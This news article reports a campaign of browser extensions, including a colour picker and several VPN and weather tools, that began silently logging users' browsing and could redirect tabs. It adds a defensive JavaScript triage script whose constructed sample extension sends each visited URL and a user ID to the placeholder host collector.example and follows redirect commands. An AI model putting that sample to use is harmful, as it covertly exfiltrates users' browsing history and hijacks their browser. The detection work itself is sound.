You Might Be Spied On, These Chrome Extensions Collected Your Data Without Warning

Several browser extensions that users had trusted for years have been flagged for silently recording the pages their users visited, reporting those visits to remote servers and, on command, redirecting users to other sites. The tools were listed in both Google’s Chrome Web Store and Microsoft Edge Add-ons and had a combined installation base exceeding 2.3 million. Most worked exactly as advertised. Some carried Google’s verified badge or were featured on the storefront, giving users a false sense of security.

Extensions That Functioned as Advertised, Until They Didn’t

One of the flagged tools was a color selection utility listed as Color Picker, Eyedropper — Geco colorpick. It did its job for years. Then a version update added background code that logged every website the user visited and sent that record to remote infrastructure.

The change went largely unnoticed. Chrome and Edge install extension updates automatically and in the background, and they only interrupt the user when an update asks for permissions the extension does not already hold; an update that merely changes the code behind existing grants arrives silently. The same mechanism that keeps extensions current pushed the malicious version to every installed copy without any action by the user.

A Pattern Behind the Code

Koi Security, the firm that investigated the extension, linked it to a broader campaign of 18 extensions, among them VPNs, weather tools, video controllers, sound boosters and emoji keyboards. Despite their different functions they shared the same surveillance code and reported to related servers: each extension used its own subdomain, but the infrastructure pointed to a single operator.

The operators needed nothing exotic. Standard extension APIs let a small background script run whenever the user opened a new tab or navigated to a page; it captured the current URL and sent it, together with a per-install user ID, to a remote server. In some cases the server answered with instructions, including redirecting the tab to a different website, so the same channel that exfiltrated browsing history could also steer the victim.
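To make that mechanism concrete, the following added example (not code from the article or from Koi Security) is a static triage script a reviewer could run over an unpacked extension's manifest.json and background scripts. It looks for the chain just described: a navigation listener, a read of the tab URL, an outbound request to a literal remote host and, optionally, a tabs.update redirect. The two sample extensions and the host collector.example are constructed for illustration, and the indicator list is a heuristic for this pattern, not a signature for the specific extensions named in the article.

```javascript
// Added example, not code from the article or from Koi Security: a static
// triage pass over an unpacked Chrome/Edge extension for the behaviour the
// article describes (a navigation listener that reads the tab URL, beacons
// it with a per-install ID to a remote host, and can redirect the tab on
// the server's reply). Heuristic only; a hit means "read this code", not
// "malicious". Both sample extensions below are constructed, and
// "collector.example" is a placeholder host, not a real indicator.

const INDICATORS = [
  { id: "nav-hook", why: "fires on every navigation",
    re: /chrome\.(tabs\.onUpdated|webNavigation\.on(BeforeNavigate|Committed|Completed))\.addListener/ },
  { id: "url-read", why: "reads the visited URL",
    re: /\b(tab|changeInfo|details)\.url\b/ },
  { id: "beacon", why: "sends data off the machine",
    re: /\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\b/ },
  { id: "install-id", why: "keeps a per-install identifier",
    re: /chrome\.storage\.(local|sync)\.(get|set)[^;]*\b(uid|user_?id|client_?id|install_?id)\b/i },
  { id: "redirect", why: "can redirect the tab on command",
    re: /chrome\.tabs\.update\(/ },
];

// Permissions that let an extension see where the user browses.
const BROWSING_GRANTS = new Set(["tabs", "webNavigation", "<all_urls>",
  "*://*/*", "http://*/*", "https://*/*"]);

// Remote hosts named in string literals of the background code (deduplicated).
function remoteHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  return [...hosts].sort();
}

function canSeeBrowsing(manifest) {
  const grants = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  return grants.some((g) => BROWSING_GRANTS.has(g));
}

// ext = { manifest: <parsed manifest.json>, scripts: [<background source>, ...] }
function triage(ext) {
  const source = ext.scripts.join("\n");
  const hits = INDICATORS.filter((i) => i.re.test(source)).map((i) => i.id);
  const hosts = remoteHosts(source);
  const seesBrowsing = canSeeBrowsing(ext.manifest);
  const has = (id) => hits.includes(id);
  // The full chain from the article: watch navigation, read the URL, send it somewhere.
  const exfilChain = seesBrowsing && has("nav-hook") && has("url-read") && has("beacon") && hosts.length > 0;
  let verdict = "clean";
  if (exfilChain) verdict = has("redirect") ? "high" : "suspicious";
  else if (seesBrowsing && hits.length >= 2) verdict = "review";
  return { name: ext.manifest.name, version: ext.manifest.version, hits, hosts, seesBrowsing, verdict };
}

// Constructed sample: a picker that only acts when the user clicks its icon.
const BENIGN = {
  manifest: { name: "Example Picker", version: "1.0", permissions: ["activeTab", "storage"] },
  scripts: [`
    chrome.action.onClicked.addListener(async () => {
      const shot = await chrome.tabs.captureVisibleTab();
      chrome.storage.local.set({ lastShot: shot });
    });`],
};

// Constructed sample: the same utility after an update adds the pattern above.
const SUSPICIOUS = {
  manifest: { name: "Example Picker", version: "1.1",
    permissions: ["activeTab", "storage", "tabs"], host_permissions: ["<all_urls>"] },
  scripts: [`
    chrome.runtime.onInstalled.addListener(() => {
      chrome.storage.local.get("uid", ({ uid }) => {
        if (!uid) chrome.storage.local.set({ uid: crypto.randomUUID() });
      });
    });
    chrome.tabs.onUpdated.addListener((tabId, changeInfo, tab) => {
      if (changeInfo.status !== "complete") return;
      chrome.storage.local.get("uid", async ({ uid }) => {
        const r = await fetch("https://collector.example/t", {
          method: "POST", body: JSON.stringify({ uid, url: tab.url }) });
        const cmd = await r.json();
        if (cmd.redirect) chrome.tabs.update(tabId, { url: cmd.redirect });
      });
    });`],
};

for (const ext of [BENIGN, SUSPICIOUS]) console.log(JSON.stringify(triage(ext)));
```

The point of the constructed pair is that the manifest diff alone is not enough: the suspicious version does add `tabs` and `<all_urls>`, which Chrome would prompt for, but an extension that already held those grants (a VPN or video controller legitimately might) could receive the same background code with no prompt at all. Run the triage on every version directory, not just the current one, to see when the chain first appeared.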

No Initial Signs of Abuse

Early versions of these extensions were clean. Many sat in the stores for months or even years without any known malicious behavior; in most cases the harmful code arrived in a later update. It remains unclear whether the original developers added it themselves or whether the extensions changed hands or were compromised.

Some of the extensions have since been removed, but several remain listed. At least one, Volume Max — Ultimate Sound Booster, had been flagged earlier by another research team; no abuse was confirmed at the time, though the code raised concerns.

Impacted Users and Recommendations

Based on current data, the affected extensions had 1.7 million installs on Chrome and another 600,000 on Edge. The researchers recommend removing every affected extension, clearing stored browser data, and scanning the system for malware. Users should also review their online accounts for unexpected activity, especially if they visited sensitive sites while the extensions were active: a log of visited URLs is more than a list of sites, since URLs frequently carry account names, document identifiers and sometimes session tokens in their query strings.

Flagged extensions include:

Color Picker, Eyedropper — Geco colorpick

Video Speed Controller — Video manager

Free Weather Forecast

Emoji keyboard online

Volume Max — Ultimate Sound Booster

Dark Theme — Dark Reader for Chrome

Unlock Discord

Unlock TikTok

Unlock YouTube VPN

Weather

SearchGPT — ChatGPT for Search Engine

Web Sound Equalizer

Flash Player — games emulator

Youtube Unblocked

Header Value

Marketplace Security Gaps

This incident highlights structural problems in how extensions are vetted. Most users assume a featured or verified listing is safe, and the operators traded on that trust. The problem was not one extension but a system that lets a code change to an already-approved listing reach millions of installs, across several storefronts at once, without anyone re-checking it.

Koi Security found that every extension tied to the campaign delivered real functionality, so users had no obvious reason to suspect they were being monitored. The investigation also coincides with MITRE’s recent reworking of its ATT&CK taxonomy, which now treats browser extensions as a sub-technique (T1176.001) of the broader Software Extensions technique.

Next Steps for Platforms and Users

Researchers recommend stricter checks before extensions are verified or promoted, and that a significant code change to an installed extension should trigger review or require the user to grant permission again rather than shipping silently. Until that happens, extension ecosystems will remain exposed to operations like this one.

The incident may serve as a reference point for platform changes, but for now users should review their installed add-ons (chrome://extensions and edge://extensions list each one with its permissions), remove anything they do not recognise or no longer use, and stay cautious about updates, even from tools they have used for years: a long clean history is exactly what these extensions had.


Notes: This post was edited/created using GenAI tools. Image: DIW-Aigen.
